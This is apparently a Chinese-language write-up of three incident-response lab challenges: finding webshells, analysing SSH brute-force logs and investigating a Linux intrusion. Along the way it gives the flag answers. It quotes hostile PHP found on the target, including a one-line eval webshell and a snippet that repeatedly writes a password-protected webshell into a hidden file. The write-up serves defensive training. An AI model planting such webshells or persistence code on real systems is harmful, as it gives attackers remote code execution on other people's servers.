应急响应-webshell查杀

靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

点击进去看看，并且使用finalshell进行远程ssh连接，然后是webshell的查杀的话，主要的就是/var/www/html的路径了，然后给他先下载看看吧，因为这个是要钱的。

flag1

html放到D盾里面进行查杀看看有没有什么木马什么的，然后出来shell.php，gz.php,top.php,.Mysqli.php这四个木马，然后一个个看呗，看gz.php的话，发现里面存在一段类似于flag的密文了，然后就是flag1了

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

flag2

然后就看gz.php这个木马里面存在这样的密文

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

然后在网上面看了看，发现是哥斯拉，然后就找到他的下载地址

https://github.com/BeichenDream/Godzilla -> flag{39392de3218c333f794befef07ac9257}

flag3

隐藏shell的完整路径，在 Linux / macOS / Unix 中：以“.”开头的文件会被默认视为隐藏文件（也叫“点文件”）。所以就是.Mysqli.php这个文件了 路径：/var/www/html/include/Db/.Mysqli.php

flag{aebac0e58cd6c5fad1695ee4d1ac1919}

flag4

免杀🐎，嗯，免杀马是指经过处理，能在一段特殊时间内绕过大部分杀毒软件检测的木马程序，然后在D盾里面就差这个shell.php和top.php没有使用了，然后在top.php里面进行了一个简单的字符变换，然后shell.php这个太简单了，肯定不是，/var/www/html/wap/top.php -> flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

应急响应-Linux日志分析

1.有多少IP在爆破主机ssh的root帐号，如果有多个使用”,”分割
2.ssh爆破成功登陆的IP是多少，如果有多个使用”,”分割
3.爆破用户名字典是什么？如果有多个使用”,”分割
4.登陆成功的IP共爆破了多少次
5.黑客登陆主机后新建了一个后门用户，用户名是多少

日志文件	记录的信息
/var/log/cron	记录与系统定时任务相关的日志
/var/log/cups/	记录打印信息的日志
/var/log/dmesg	记录了系统在开机时内核自检的信息。也可以使用dmesg命令直接查看内核自检信息
/var/log/btmp	记录错误登陆的日志。这个文件是二进制文件，不能直接用Vi查看，而要使用lastb命令查看。命令如下：[root@localhost log]#lastb root tty1 Tue Jun 4 22:38 – 22:38 (00:00) #有人在6月4日22:38便用root用户在本地终端1登陆错误
/var/log/lasllog	记录系统中所有用户最后一次的登录时间的日志。这个文件也是二进制文件。不能直接用Vi查看，而要使用lastlog命令查看
/var/log/maillog	记录邮件信息的日志
/var/log/messages	它是核心系统日志文件，其中包含了系统启动时的引导信息，以及系统运行时的其他状态消息。I/O错误、网络错误和其他系统错误都会记录到此文件中。其他信息，比如某人的身份切换为root，已经用户自定义安装软件的日志，也会在这里列出。
/var/log/secure	记录验证和授权方面的信息，只要涉及账户和密码的程序都会记录，比如系统的登录、ssh的登录、su切换用户，sudo授权，甚至添加用户和修改用户密码都会记录在这个日志文件中
/var/log/wtmp	永久记录所有用户的登陆、注销信息，同时记录系统的启动、重启、关机事件。同样，这个文件也是二进制文件。不能直接用Vi查看，而要使用last命令查看
/var/tun/ulmp	记录当前已经登录的用户的信息。这个文件会随着用户的登录和注销而不断变化，只记录当前登录用户的信息。同样，这个文件不能直接用Vi查看，而要使用w、who、users等命令查看

当然，日志里面最常用的就是auth.log

登录和注销活动	成功和失败的登录尝试 用户注销事件
认证过程	SSH 登录尝试（成功和失败） 本地控制台登录 Sudo 提权事件（成功和失败）
安全事件	无效的登录尝试 错误的密码输入 锁定和解锁屏幕事件
系统账户活动	用户添加、删除和修改 组添加、删除和修改
PAM（Pluggable Authentication Modules）相关信息	各种 PAM 模块的日志输出，包括认证和会话管理

首先既然是日志的话，先下载log,然后在debian中，ssh登录日志通常保存在/var/log/auth.log

flag1

有多少ip在爆破密码，嗯，

cat auth.log.1|grep -a "Failed password for root" //查看auth.log.1这个日志里面的内容并且把其当成文本来看并且出来里面含有Failed password for root的内容

Aug  1 07:47:13 linux-rz sshd[7497]: Failed password for root from 192.168.200.2 port 34703 ssh2
Aug  1 07:47:18 linux-rz sshd[7499]: Failed password for root from 192.168.200.2 port 46671 ssh2
Aug  1 07:47:20 linux-rz sshd[7501]: Failed password for root from 192.168.200.2 port 39967 ssh2
Aug  1 07:47:22 linux-rz sshd[7503]: Failed password for root from 192.168.200.2 port 46647 ssh2
Aug  1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2
Aug  1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2

3个ip，直接flag{192.168.200.2,192.168.200.31,192.168.200.32}

flag2

登录成功的账号 cat auth.log.1|grep -a “Accepted”

Aug  1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2
Aug  1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2

出来了ip flag{192.168.200.2}

flag3

查看用户使用的字典

cat auth.log.1|grep -a "Failed password"| grep -o 'for .* from'|uniq -c|sort -nr

5 for invalid user user from
      5 for invalid user hello from
      5 for invalid user  from
      4 for root from
      1 for root from
      1 for root from
      1 for invalid user test3 from
      1 for invalid user test2 from
      1 for invalid user test1 from

flag{user,hello,root,test3,test2,test1}

flag4

查看ip登录成功的次数的话，cat auth.log.1|grep -a “192.168.200.2”|grep “for root” 不过要记得找有”Accept”的，因为这个是成功的登录，所以 flag{4}

flag5

新的用户名，嗯

cat auth.log.1 |grep -a “new user”

flag{test2}

应急响应- Linux入侵排查

1.web目录存在木马，请找到木马的密码提交
2.服务器疑似存在不死马，请找到不死马的密码提交
3.不死马是通过哪个文件生成的，请提交文件名
4.黑客留下了木马文件，请找出黑客的服务器ip提交
5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交

然后因为是入侵排查的话，就要下载/var/www目录和/var/log这两个目录了

flag1

存在木马，直接把www目录放到D盾里面进行扫描，出现.shell.php和1.php和1.tar和index.php

然后要找到木马的密码，在1.php里面发现

<?php eval($_POST[1]);?>

密码就是1了(来自web手的肯定) -> flag{1}

flag2

要找到不死🐎的话，要先知道什么是不死🐎，不死🐎就是由客户端发起的Web请求后，中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作，内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件，插入恶意的shellcode，达到持久化控制服务器的目的，嗯。就是通过将小🐎不断传入到可能检查不到的地方，并且持续进行入侵

而在index.php里面发现下面的话

$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);

不断将小🐎传到.shell.php里面，那么不死🐎就出来了 5d41402abc4b2a76b9719d911017c592 -> flag{hello}

flag3

产生不死🐎的文件，就是index.php了，所以flag{index.php}

flag4+flag5

这里参考sun师傅的，直接放到云沙盒里面分析出来黑客的ip flag{10.11.55.21}以及端口flag{3333}